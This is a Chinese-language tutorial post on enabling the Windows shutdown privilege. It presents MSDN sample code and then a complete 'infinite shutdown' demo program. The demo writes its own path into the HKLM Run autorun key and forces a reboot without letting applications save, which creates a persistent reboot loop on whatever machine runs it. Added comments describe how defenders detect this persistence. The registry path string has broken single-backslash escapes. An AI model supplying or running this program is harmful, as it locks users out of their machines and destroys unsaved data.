在 Windows 系统中,当本进程要去操作其他进程,或者要使用 shutdown 这类高危命令时,就涉及“提权”。这里的“提权”指的是启用进程令牌中已经持有、但默认处于禁用状态的特权;AdjustTokenPrivileges 不能给令牌添加账户原本没有的特权。下面是 MSDN 的例子
提权三兄弟
OpenProcessToken
LookupPrivilegeValue
AdjustTokenPrivileges

我们用下面这个MSDN的代码来做一个注册表无限关机的例子
#include <windows.h>
#pragma comment(lib, "user32.lib")
#pragma comment(lib, "advapi32.lib")
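/**
 * Enable the shutdown privilege on the current process token, then ask
 * Windows to shut down and force applications to close.
 *
 * The privilege is only *enabled* here. AdjustTokenPrivileges switches on a
 * privilege the token already holds; it cannot add one that the account was
 * never granted, in which case GetLastError() reports ERROR_NOT_ALL_ASSIGNED
 * and this function returns FALSE.
 *
 * @return TRUE if ExitWindowsEx accepted the request, FALSE if any step
 *         (token open, LUID lookup, privilege enable, shutdown call) failed.
 */
BOOL MySystemShutdown()
{
    HANDLE hToken = NULL;
    TOKEN_PRIVILEGES tkp;
    BOOL adjusted;
    DWORD adjustError;

    // Get a token for this process.
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return FALSE;
    }

    // Get the LUID for the shutdown privilege. If the lookup fails the LUID
    // in tkp is uninitialised, so stop instead of passing it on.
    if (!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,
                              &tkp.Privileges[0].Luid)) {
        CloseHandle(hToken);
        return FALSE;
    }

    tkp.PrivilegeCount = 1; // one privilege to set
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    // Enable the shutdown privilege for this process. The call can return
    // TRUE while assigning nothing, so the last-error value is checked too.
    adjusted = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
                                     (PTOKEN_PRIVILEGES)NULL, 0);
    adjustError = GetLastError(); // capture before CloseHandle can change it

    // The adjustment lives on the token object, not on this handle, so the
    // handle can be released now on every path.
    CloseHandle(hToken);

    if (!adjusted || adjustError != ERROR_SUCCESS) {
        return FALSE;
    }

    // Shut down the system. EWX_FORCE closes applications without giving
    // them the chance to save, so unsaved data in other programs is lost.
    if (!ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE,
                       SHTDN_REASON_MAJOR_OPERATINGSYSTEM |
                       SHTDN_REASON_MINOR_UPGRADE |
                       SHTDN_REASON_FLAG_PLANNED)) {
        return FALSE;
    }

    // The shutdown request was accepted.
    return TRUE;
}
上面是MSDN的代码,下面给出无限关机的代码(含详细注释)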
// shutdownDemo.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include <windows.h>
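/**
 * Enable the shutdown privilege on the current process token, then request
 * a forced reboot.
 *
 * "Raising privilege" in this sample means enabling SE_SHUTDOWN_NAME, which
 * the token must already hold. AdjustTokenPrivileges cannot grant a
 * privilege the account does not have; in that case GetLastError() reports
 * ERROR_NOT_ALL_ASSIGNED and this function returns FALSE.
 *
 * @return TRUE if ExitWindowsEx accepted the request, FALSE if any step
 *         (token open, LUID lookup, privilege enable, reboot call) failed.
 */
BOOL MySystemShutdown()
{
    HANDLE hToken = NULL;   // handle to this process's access token
    TOKEN_PRIVILEGES tkp;   // describes the single privilege to enable

    // Get a token for this process.
    if (!OpenProcessToken(GetCurrentProcess(),
                          TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) {
        return FALSE;
    }

    // The privilege is enabled by the next two calls: look up its LUID,
    // then adjust the token. A failed lookup leaves the LUID uninitialised,
    // so stop here rather than hand it to AdjustTokenPrivileges.
    if (!LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,
                              &tkp.Privileges[0].Luid)) {
        CloseHandle(hToken);
        return FALSE;
    }

    tkp.PrivilegeCount = 1; // one privilege to set
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

    // AdjustTokenPrivileges can return TRUE while assigning nothing, so both
    // the return value and the last-error value are checked.
    BOOL adjusted = AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,
                                          (PTOKEN_PRIVILEGES)NULL, 0);
    DWORD adjustError = GetLastError(); // capture before CloseHandle runs

    // The adjustment is stored on the token object, so the handle is no
    // longer needed and is released on every path.
    CloseHandle(hToken);

    if (!adjusted || adjustError != ERROR_SUCCESS) {
        return FALSE;
    }

    // Reboot the system. EWX_FORCE closes applications without giving them
    // the chance to save, so unsaved data in other programs is lost.
    if (!ExitWindowsEx(EWX_REBOOT | EWX_FORCE,
                       SHTDN_REASON_MAJOR_OPERATINGSYSTEM |
                       SHTDN_REASON_MINOR_UPGRADE |
                       SHTDN_REASON_FLAG_PLANNED)) {
        return FALSE;
    }

    // The reboot request was accepted.
    return TRUE;
}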
// Console entry point of the demo: waits for input, registers this
// executable as an autorun value named "ShutDown" under the HKLM Run key,
// then calls MySystemShutdown().
//
// Defender's view: an autorun value pointing at the program that wrote it is
// the Registry Run Keys persistence pattern (MITRE ATT&CK T1547.001). The
// artifact left behind is the "ShutDown" value in that key, holding this
// executable's path; deleting that value stops the program from starting at
// logon. Autorun inventories (e.g. Sysinternals Autoruns) and registry
// value-set telemetry (e.g. Sysmon event ID 13) surface the write.
//
// None of the return values below are checked, so a failed open or write is
// silent, and no RegCloseKey call for hKey is visible in this function.
int _tmain(int argc, _TCHAR* argv[])
{
// Blocks until a character can be read from stdin.
getchar();
// Zero-initialised; stays that way if the open below fails.
HKEY hKey = { 0 };
/*LONG RegOpenKeyEx(
HKEY hKey, // root (predefined) key to open under
LPCTSTR lpSubKey, // name of the subkey to open
DWORD ulOptions, // reserved, set to 0
REGSAM samDesired, // access mask, i.e. the rights requested
PHKEY phkResult // receives the handle of the opened key
)*/
// Entries under the HKLM Run key are started at logon for every user.
// NOTE(review): writing under HKEY_LOCAL_MACHINE normally requires an
// elevated process; confirm how this is expected to be launched.
RegOpenKeyExA(HKEY_LOCAL_MACHINE,"Software\Microsoft\Windows\CurrentVersion\Run",0,KEY_WRITE,&hKey); // open the specified registry key
char path[MAX_PATH] = { 0 };
GetModuleFileNameA(nullptr, path, MAX_PATH); // path of the current executable
// Store the executable's own path as a REG_SZ value named "ShutDown".
RegSetValueEx(hKey, "ShutDown", 0, REG_SZ, (byte*)path, strlen(path));
// Result ignored: main returns 0 whether or not the call succeeded.
MySystemShutdown();
return 0;
}如果出现下面问题

请修改字符集如下

下面看看运行结果!
